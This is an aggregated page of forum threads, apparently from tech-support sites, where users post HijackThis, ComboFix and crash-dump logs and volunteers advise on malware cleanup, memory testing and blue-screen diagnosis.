Double-click gmer.exe. The program will begin to run.

**Caution**
These types of scans can produce false positives. Do NOT take any action on any "<--- ROOTKIT" entries unless advised by a trained Security Analyst

If possible rootkit activity is found, you... Read more

3 more replies
Answer Match 40.74%

Ran a hijack this log, I think I have spyware or other malware clogging me up. Please help by telling me what I can delete! Thank you.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:24:38 PM, on 12/19/2011
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\AVG\AVG10\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Documents and Settings\Nick and Ashley\Desktop\Protection\damn\Malwarebytes' Anti-Malware\mbamservice.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files\AVG\AVG10\avgtray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files&#... Read more

A:HiJcak This log...Please Interpret

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/433441 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Answer Match 40.74%

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 23:34:17, on 13/10/2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\IDT\WDM\stacsv.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\Program Files\IDT\WDM\sttray.exe
C:\WINDOWS\system32\AESTFltr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Documents and Settings\Sjefen\Application Data\Spotify\Data\SpotifyWebHelper.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\dllhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Applicatio... Read more

A:can anyone interpret (hijack)this?

to BleepingComputer.My name is Matthias and I'll help you with the cleanup of your computer.Please be aware of the following:Please complete all steps in the specified order.Even if tools don't find malware, I want you to post the logfiles anyway.Please copy and paste the logfiles directly into your posts. Please do not attach them unless you are instructed to do so.Read the instructions carefully. If you have problems, stop what you were doing and describe the problems you encountered as precisely as you can.Don't install or uninstall software during the cleanup unless you are told to do so.If you can't answer for the next few days, please let me know. If you haven't answered within 5 days, I am assuming that you don't need help anymore and your topic will be closed.I can not guarantee that we will find and be able to remove all malware. Formatting is usually faster and always the safest way.If you decide to clean your PC, work with us until a team member tells you that you are clean.As my first language is not English, please do not use slang or idioms. It could be hard for me to understand.The HijackThis logfile looks clean, but it gives us only a little insight of the computer.Are there any kind of malware related problems? If so, please describe them.Are you interested in further analysis of this computer?

3 more replies
Answer Match 40.74%

I'm running Windows 7 in a Dell Optiplex 320, more info in my profile. It's very sluggish and flashes a lot of "Not Responding" notices. I will shortly install more RAM and a more adequate hard drive, which I hope will improve performance a lot, but I want to check with you to see if there is anything I should do to prevent problems from carrying over. I hope this is the right place to post. If you want a DDS log or anything of the sort, please e-mail me. 
 
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:12:11 PM, on 6/10/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17041)
Boot mode: Normal
 
Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files\Common Files\microsoft shared\Works Shared\WkUFind.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Go... Read more

A:Hijack This Log: Please help interpret

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Download Malwarebytes' Anti-Malware from HereDouble-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).The scan may take some time to finish,so please be patient.If potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.While still on the Scan tab, click the link for View detailed log, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.The log is automatically saved by MBAM and can also be viewed by clicking the History tab and then selecting Application Log... Read more

12 more replies
Answer Match 40.74%

Greetings all tech masters ,

I was wondering if someone could help me interpret my hijackthis log file and help me determine what entries were bad or not and how to clean them out.

For starters, I read a couple other posts that were related to some of the problems I have been having. So I have done the following. I enabled all of the startup processes in my msconfig. I ran the vundofix.exe, which removed 4 files. So what should I do next?

My system specs are:
Windows XP Pro SP 2(latest build)
AMD Athlon xp 2100+ 1.74ghz
1.00 gb of ram
ati radeon 9800se 128mb 256bit
creative soundblaster Audigy 2zs

And here is my hijack this log:

Logfile of HijackThis v1.99.1
Scan saved at 9:09:17 PM, on 10/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe
C:\Program Files\Creative\SBAudigy2ZS\DVDAudio\CTDVDDet.EXE
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe ... Read more

A:Could someone please help me interpret the log file?

combofix log file:

ComboFix 07-10-04.5 - Joe 2007-10-04 21:29:33.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.594 [GMT -5:00]
Running from: C:\Documents and Settings\Joe\desktop\combofix.exe
Command switches used :: /killall
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\check_LSA7.txt
C:\Temp\1cb
C:\Temp\1cb\syscheck.log
C:\WINDOWS\system32\b1
C:\WINDOWS\system32\m2
C:\WINDOWS\system32\p1
C:\WINDOWS\system32\rlxf.dll
C:\WINDOWS\system32\s9
C:\WINDOWS\system32\v2

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))


-------\LEGACY_CMDSERVICE
-------\LEGACY_NETWORK_MONITOR


((((((((((((((((((((((((( Files Created from 2007-09-05 to 2007-10-05 )))))))))))))))))))))))))))))))
.

2007-10-04 21:27 51,200 --a------ C:\WINDOWS\NirCmd.exe
2007-10-04 20:51 <DIR> d-------- C:\!KillBox
2007-10-04 20:36 <DIR> d-------- C:\VundoFix Backups
2007-10-03 19:44 <DIR> d-------- C:\Documents and Settings\Joe\Application Data\TC
2007-10-03 19:40 <DIR> d-------- C:\Documents and Settings\Joe\Application Data\CheckPoint
2007-10-03 19:37 <DIR> d-------- C:\Program Files\CheckPoint
2007-10-02 00:09 <DIR> d-------- C:\Documents and Settings\Joe\Application Data\Prevx
2007-10-02 00:08 <DIR> d-------- C:\Program Files\Prevx2
2007-10-01 23:45 <DIR> d---... Read more

8 more replies
Answer Match 40.74%

document folder so that when >right click>send to> My Documents the trail actually leads to
and ends at the new partition? If I'm approaching this in a westwardly manner it would seem
like there would be a way to change the path to point to the "My Docs S:" partition.
 

A:Solved: Moving "My Docs" from C: to another partition is there a way to set up the new docume

http://www.kellys-korner-xp.com/win_xp_mydocs.htm

Should cover what you need at the above site.
 

3 more replies
Answer Match 40.74%

help me after scanning my computer with avg i get this warning:
"Windows cannot find "COCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe".Make sure you typed the same corrently, and then try again. To search for a file, click the start button, and then click Search. Ok
i want to get rid of this Warning. It appears on desk top whenever i startup computer. My friend tells me it is to do with regedit
 

A:"C:DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe"

8 more replies
Answer Match 40.74%
Q: Paths

Quote:




Sounds like your PATHS are wrong ?



This is always fun.



You need to ?locate? the nmake.exe and ensure that the path to this file eg, c:\myfiles\nmake.exe is listed in PATH




This is something someone told me i needed to do to finish compiling a program (anope IRC services)

Frankly I'm rather new to all of this and have no clue exactlly what to do

Any help would be greatly appreciated

A:Paths

This page has the full instructions for building Anope for Windows

4 more replies
Answer Match 40.32%

Hallo to everybody.
A CCE scanning in my notebook has found a hidden value in Windows registry with a high level of risk. I've tried to search it in Web, without any results.
I'd like to know how to get some information in a possibly threat like this, even for the future.
My notebook's got W 8.1 installed.
The value found is:
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\{C1553357-8556-48BA-BE8D-60C97DCFDAAD}
Thanks in advance for your suggestions.
 

A:how to interpret a CCE hidden value detected

It's a registry value to set *something* to automatically run once at startup.

The CLSID does not match anything, so it's suspicious. You might consider asking for malware removal assistance.
 

2 more replies
Answer Match 40.32%

Hi guys,
I found everything about how to read out the Dumpfiles but now I have a problem to interpret it . Maybe someone of you is able to give me the information, where the problem in my system occures. Here is my Dump file:
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

MEMORY_MANAGEMENT (1a)
# Any other values for parameter 1 must be individually examined.
Arguments:
Arg1: 0000000000041790, The subtype of the bugcheck.
Arg2: fffffa800036cc90
Arg3: 000000000000ffff
Arg4: 0000000000000000

Debugging Details:
------------------
BUGCHECK_STR: 0x1a_41790

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT

PROCESS_NAME: svchost.exe

CURRENT_IRQL: 0

LAST_CONTROL_TRANSFER: from fffff80002ef7f9e to fffff80002e84740

STACK_TEXT:
fffff880`07a12968 fffff800`02ef7f9e : 00000000`0000001a 00000000`00041790 fffffa80`0036cc90 00000000`0000ffff : nt!KeBugCheckEx
fffff880`07a12970 fffff800`02ec60da : 00000000`00000000 00000000`2850ffff fffffa80`00000000 fffffa80`0549cb30 : nt! ?? ::FNODOBFM::`string'+0x33906
fffff880`07a12b30 fffff800`02e83993 : ffffffff`ffffffff 00000000`039ff6f8 00000000`039ff6f0 00000000`00008000 ... Read more

A:Cannot interpret Dump file

Simply put, that dump doesn't give us the info we want.

It blames ntkrnlmp.exe, which is the main Windows NT Kernel driver. That means whatever offending driver gave up control to the kernel before it crashed.

Or, it means hardware is the cause.

We do know it has the bugcheck 1A. You can read about it here: http://www.carrona.org/bsodindx.html#0x0000001A

You can try enabling driver verifier, to try to get a third-party driver to crash, and leave evidence in dump.

http://www.techsupportforum.com/f217...ed-473665.html

If driver verifier doesn't give conclusive evidence, we can start testing hardware.

If you want to try to debug the dumps yourself, we will be happy to assist you. We are also happy to do it ourselves. If you would like us to take a look, please follow these directions: http://www.techsupportforum.com/f217...ns-452654.html

1 more replies
Answer Match 40.32%

Say I'm visiting a website similar to this (forum & downloads type). Let's call it site S.
On their screen are few ads by companies A1 and A2.
I was told the software displaying the ads is actually installed at site S.
The ads and site S are shiny-clean. I have no problem with them.
No trash, no junk, no viruses that I can see.
I may even haved placed site S into the trusted zone 'cause I mean they're clean. But I'm not sure.

I don't understand what I see in the OUTGOING portion of the Linksys router log.
When I visit Site S, the log contains a continuous outgoing stream, such as:
site S IP address and name
site A1 IP address and name
site S IP address and name
site A1 IP address and name
site S IP address and name
site A2 IP address and name
site S IP address and name
site A1 IP address and name

What is my computer sending out to A1 and A2? Why?
They don't talk to me (nothing in the INCOMING log). I have nothing to say.
By way of experiment, I blocked everything one can block for A1 and A2 in Zone Alarm.
Initially A1 and A2 dropped out of the log. Then a day later, after rebooting they're back.

Incidentally, above is just a stream. When connected to BC, it's a raging, outgoing, river

A:Interpret outgoing router log

Heres the dealio with ads. The images and information for ads are always found off the site in question and stored in the advertisers platform site. So if you visit my site and ads come up, your computer will actually get that information from other sites and not BC which si why you see those connections.

1 more replies
Answer Match 40.32%

Is there any way (through software, or built-in Windows features) to interpret 'Audio Out' as 'Microphone In'. The reason I want to do this is that Teamviewer uses VoIP so you can hear whatever is spoken into the microphone, but I want to hear whatever sound the computer is making. Is there anyway of doing this?
I could use this neat little wire but I would prefer a free software option.
Otherwise, do you know of any software that allows you to stream audio from your audio card over the internet?
 

More replies
Answer Match 40.32%

Windows XP - Used dumpchk to create txt files for some memory dumps and now I'm not too sure whether it's a hardware or software (driver) issue...i think i have an idea but just want to verify first...tanx...vk.
Here's one of em:
DUMP_HEADER32:
MajorVersion 0000000f
MinorVersion 00000a28
DirectoryTableBase 02b602c0
PfnDataBase 805610a8
PsLoadedModuleList 8055c700
PsActiveProcessHead 805627b8
MachineImageType 0000014c
NumberProcessors 00000002
BugCheckCode 0000000a
BugCheckParameter1 09000055
BugCheckParameter2 0000001c
BugCheckParameter3 00000001
BugCheckParameter4 80501ff4
PaeEnabled 00000001
KdDebuggerDataBlock 8054c2e0
MiniDumpFields 000004ff

TRIAGE_DUMP32:
ServicePackBuild 00000200
SizeOfDump 00010000
ValidOffset 0000fffc
ContextOffset 00000320
ExceptionOffset 000007d0
MmOffset 00001068
UnloadedDriversOffset 000010a0
PrcbOffset 00001878
ProcessOffset 00002268
ThreadOffset 000024c0
CallStackOffset 00002720
SizeOfCallStack 00004000
DriverListOffset 000069b0
DriverCount 0000007d
StringPoolOffset 00008ed0
StringPoolSize 000026a0
BrokenDriverOffset 00000000
TriageOptions ffffffff
TopOfStack f8a94da4
DebuggerDataOffset 00006720
DebuggerDataSize 00000290


Windows XP Kernel Version 2600 (Service P... Read more

A:How to interpret MEMORY DUMPS?!?!?!

Bugcheck paramter 2 is IRQL and your value is x'1c' which is a clock level interrupt. Clock level interrupt is a well test routine. My XP has thousands of clock level interrupts within an hours. Clock level interupt routine does not crash unless it is hardware error at CPU, M/B or RAM. I've resovled several case of Bugeck 0A at IRQL x'1c' and they are related to hardware error.

Refer the following urls and it has link to some of my resolved cases of clock level interrupt interrupt at XP
http://www.experts-exchange.com/Operating_Systems/WinNT/Q_21419604.html
http://www.experts-exchange.com/Operating_Systems/WinNT/Q_21361736.html
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_21306911.html
http://www.techspot.com/vb/showthread.php?p=143574#post143574 refer page 8 Kritonas
kritonas install the CPU hot tester and find out this is CPU problem. You can ask him the url of the hot tester link.

http://www.techspot.com/vb/showthread.php?p=144841#post144841 refer the post from Boxer
 

2 more replies
Answer Match 40.32%

I have been running Windows 7 for about a month with no issues. The last few days I've had random BSOD's. I cant open the minidump files because Windows 7 denies access.
Here is the Problem document:

Problem signature:
Problem Event Name: BlueScreen
OS Version: 6.1.7600.2.0.0.768.3
Locale ID: 1033

Additional information about the problem:
BCCode: 7f
BCP1: 0000000000000008
BCP2: 0000000080050031
BCP3: 00000000000006F8
BCP4: FFFFF80002ACC314
OS Version: 6_1_7600
Service Pack: 0_0
Product: 768_1

Files that help describe the problem:
C:\Windows\Minidump\011710-23649-01.dmp
C:\Users\Mrt\AppData\Local\Temp\WER-40076-0.sysdata.xml

Read our privacy statement online:
Windows 7 Privacy Highlights - Microsoft Windows

If the online privacy statement is not available, please read our privacy statement offline:
C:\Windows\system32\en-US\erofflps.txt

I have attached the dump files if anyone can interpret them.

I know most of these crashes point to Memory, I am running 2 2GB sticks of Kingston ValueRam. They are matched and 2months old. They have been rock solid.

ASUS M2N MX SE nForce 6100, Onboard Video, PCI-EX, DDR2 ,LAN
AMD Athlon 64 x2 5200+ (Dual Core) AM2 2048K Cache

Windows 7 Home
Zone Alarm Extreme
MY Daughter has a new HP Laptop with Windows 7 that she got new for Christmas. She has now started getting the BSOD while watching videos..etc (One issue at a time)
THANKS for any help!! These BSOD are random..... Read more

A:BSOD and MiniDump..Can someone interpret?

  
Quote: Originally Posted by scarb


I have been running Windows 7 for about a month with no issues. The last few days I've had random BSOD's. I cant open the minidump files because Windows 7 denies access.
Here is the Problem document:

Problem signature:
Problem Event Name: BlueScreen
OS Version: 6.1.7600.2.0.0.768.3
Locale ID: 1033

Additional information about the problem:
BCCode: 7f
BCP1: 0000000000000008
BCP2: 0000000080050031
BCP3: 00000000000006F8
BCP4: FFFFF80002ACC314
OS Version: 6_1_7600
Service Pack: 0_0
Product: 768_1

Files that help describe the problem:
C:\Windows\Minidump\011710-23649-01.dmp
C:\Users\Mrt\AppData\Local\Temp\WER-40076-0.sysdata.xml

Read our privacy statement online:
Windows 7 Privacy Highlights - Microsoft Windows

If the online privacy statement is not available, please read our privacy statement offline:
C:\Windows\system32\en-US\erofflps.txt

I have attached the dump files if anyone can interpret them.

I know most of these crashes point to Memory, I am running 2 2GB sticks of Kingston ValueRam. They are matched and 2months old. They have been rock solid.

ASUS M2N MX SE nForce 6100, Onboard Video, PCI-EX, DDR2 ,LAN
AMD Athlon 64 x2 5200+ (Dual Core) AM2 2048K Cache

Windows 7 Home
Zone Alarm Extreme
MY Daughter has a new HP Laptop with Windows 7 that she got new for Christmas. She has now started getting the BSOD while watching videos..et... Read more

9 more replies
Answer Match 40.32%

Could someone interpret these results for me? Also ran Combofix and clock is now in military time. How to change back?
Thanks,
jberd99usa
 

A:Solved: Interpret Combofix

16 more replies
Answer Match 40.32%

Can someone interpret this for me? Thanks, jberd99usa
 

A:Solved: Hijack this interpret

16 more replies
Answer Match 40.32%

I get an ID2019 every 3 days or so, and windows stops functioning.

I've used poolmon to create a log file as instructed by the microsoft article.

Should I post it here? Or can someone diagnose my problem?

Thanks!

A:Memory leak - please interpret my 2-hr log

I tried posting my log, but it messes up the columns and headings. If someone knows how to read this data, I could email it to you.

2 more replies
Answer Match 40.32%

Getting the Watchdog violation (that is the .dmp file)

https://www.dropbox.com/sh/0qi6gaehqgyalv4/kYc0mVf5AH

A:Can someone interpret this dump file

Originally Posted by regnaston


Getting the Watchdog violation (that is the .dmp file)

https://www.dropbox.com/sh/0qi6gaehqgyalv4/kYc0mVf5AH



All the dump files mention hal.dll as the culprit which seems to be involved with the windows boot process , it could be a hardware problem with the boot drive (possible but unlikely), issues with the boot order of your hard drives in the BIOS, did you add a new drive recently?.

Tried booting from cd and trying automatic repair?

Check from the command prompt using

chkdsk c: /r /f
sfc scannow

If none of the above apply then hal.dll has become corrupted, if this is the case then you will probably need to restore/refresh/reset your windows 8 install from the original installation disk.

3 more replies
Answer Match 40.32%

The virus redirects my homepage at all times. Ive been reading some threads and got as far as getting the hijack this log file for the CWS.searchx virus. Now what do I do from here? What do I delete, and so forth?, Please help me....Thanks.

Logfile of HijackThis v1.98.2
Scan saved at 7:08:30 PM, on 10/1/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\atiptaxx.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb04.exe
C:\WINDOWS\System32\hphmon03.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\system32\mfcod.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\sdkjb32.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Spyware Doctor\spydoctor.exe
C:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\mapi32.exe
C:\PROGRA~1\WINZIP\winzip32.exe
C:\unzipped\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = res://C:\WINDOWS\system32\pxeju.dll/sp.html#37049
R1 - HKC... Read more

A:Help interpret Hijackthis file and what to do.

10 more replies
Answer Match 40.32%

I ran hijackthis for first time, would someone help me figure it out? Thanks much. I also run spybot and adaware regularly but still have many popups which seem to be coming from IE. I have a dell 4550 with xp pro.
 

A:Solved: help interpret hijackthis log

14 more replies
Answer Match 40.32%

Hello all...


Bought a video from my last thread and now that I have it installed <Asylum GeForce FX 5700 ultra>, I've ran 3Dmark twice now and they are close as to the #'s., But something doesn't seem right watching the video's for the tests. Last card was a GeForce 2 mx 400, so I expected some great things, But for some reason I don't feel so good about it...lol

Can someone give me some tips, or settings or even if I have to have the Nvidia desktop running to make it work better...? lol

Drivers Are up to date on video/audio, everything else, (mobo,chip) pretty much no.

I also thought I could get a score or frame rate from playing my own game (desert combat), but it only runs its own..??

Thanks for the help..................

Have a great day................:rolleyes:



***General Information***

Operating System Microsoft Windows ME
DirectX Version 9.0b
Mobo Manufacturer Intel Corporation
Mobo Model D815EEA

AGP Rates (Current/Available) 0x /

CPU Intel Pentium III 930 MHz
FSB 133 MHz
Memory 512 MB



Display Information
Graphics Chipset NVIDIA GeForce FX 5700 Ultra
Driver Name NVIDIA GeForce FX 5700 Ultra
Driver Version 4.14.10.5304
Driver Status Non WHQL
Video Memory 128 MB

Core Clock 50 MHz

Memory Clock 209 MHz

Sound Information
Sound Adapter Driver Name SB Live! Wave Device
Sound Adapter Driver Version

Benchmark Se... Read more

A:Help interpret My 3Dmark03 scores....please

Looks fine for a 5700. I get ~5600 with a 9800 Pro.

3dMark03 tests the video card and not much else. If you want higher scores, you have to get a better video card.

I don't know how much that 5700 cost you, but slap yourself if you paid ~$150 because a 9600XT/Pro costs that much.
 

3 more replies
Answer Match 40.32%

Got a virus yesterday that seems to have affected the hard drive. Ran ComboFix a few times today. The system seems stable now, no longer giving me warnings about hard drive and RAM failures. The first log mentions that an infected copy of volsnap.sys was found and disinfected. But, all old icons (other than Trash and Internet Explorer) are still gone from the desktop. Most programs (including MS Office) still do not show up in the Start menu. Ad-aware does not work, though some other anti-spyware programs have. Firefox mostly seems to work fine, whereas it wouldn't start when the virus broke out.

Here are my two logs from ComboFix. Any help understanding what to do next would be very appreciated. Thank you!

A:Please help me interpret these 2 ComboFix logs

I think I figured it out. I found the virus file that deceived me about the extent of system damage and tried to get me to pay for fake removal software. I then figured that the virus simply hid all my desktop files to trick me into thinking that my system was totally screwed. I then changed the option to show all hidden files and everything appeared back on my desktop. Now I just have to make sure the virus doesn't reinstall itself.

2 more replies
Answer Match 40.32%

HiMy Windows 7 (64bit) Computer shuts down (no blue screen of death) suddenly when I try and virus/spyware/malware FULL Scan using several programs like Microsoft Securities Essential, AVG, Spybot S & D and online virus checkers like PandaI have used HighJack THis from Trend micro and generated a log file. Can you please interpret it for me? How do I send the log in text format. Do I just copy and paste it to this message?Please replyHere is the log file:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 15:01:28, on 25/02/2010Platform: Unknown Windows (WinNT 6.01.3504)MSIE: Internet Explorer v8.00 (8.00.7600.16385)Boot mode: NormalRunning processes:C:\Program Files (x86)\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exeC:\Program Files (x86)\Java\jre6\bin\jusched.exeC:\Windows\SysWOW64\Ctxfihlp.exeC:\Program Files (x86)\Common Files\Real\Update_OB\realsched.exeC:\Program Files (x86)\Creative\Volume Panel\VolPanlu.exeC:\Windows\SysWOW64\CTXFISPI.EXEC:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exeC:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXEC:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXEC:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exeC:\Program Files (x86)\Windows Live\Contacts\wlcomm.exeC:\Program Files (x8... Read more

A:Can you please help interpret HiJackTHis log file?

Hi kenki,Welcome to Bleeping Computer.My name is mpascal, and I will be helping you fix your problem.Before we begin, I would like to make a few guidelines so that we can fix your problem as efficiently as possible:Be sure to follow all my instructions carefully! If there is anything you don't understand, don't hesitate to ask.Please do not do anything or perform other steps unless I have asked you to do so.Please make sure you post all logs I ask you to, and make sure that the entire log gets posted.If you are unsure of how to reply, or need help with anything regarding the website, please look here.Please keep in mind that I am still in training and so there may be a slight delay between replies. This is so that a resident expert can check my responses to ensure we get your computer fixed as quickly and effectively as possible.Please follow the instructions in the Preparation Guide and post back with the following logs:DDS LogGMER Log

18 more replies
Answer Match 40.32%

My computer has been way slower than it should be with occasional freezes when using multiple software. I ran Memtest86+ and got this:



How should I interpret this? I'm a newbie and have no clue what to do next.

Any help is appreciated.

Grateful

A:How to interpret Memtest86+ results

How many sticks of RAM do you have?

7 more replies
Answer Match 40.32%

I just built a new machine and it looks working fine but a memtest(Memtest86 v.4.20) returned errors whose screen shot is as follows.
What exactly does this mean beyond that the errors were detected?
1. Is the Test #7 being done when this shot was taken?
2. The error happened while the test #6 was running?
3. The error happened for bits pattern of b4ffl1ff?
4. Are all bit patterns tried for each test of #0, #1, #2, , , ?
5. What does the "Bits in Error" mean?
6. What do "Pass 37%" and "Test 72%" mean?

A:Memtest results - How to interpret

Hiyya churin mate I know this will sound rather tedious but personally I would run memtest with each stick in separately as it could be just one of the sticks that is bad.
That is stick 1 in slot 1 and then 2 then stick 2 the same config.
If that doesn't come up with anything it could be a slot.

That readout I have not seen it show like that before as usually the errors are shown as red bars that go across the width of the screen like in the pic.

9 more replies
Answer Match 40.32%

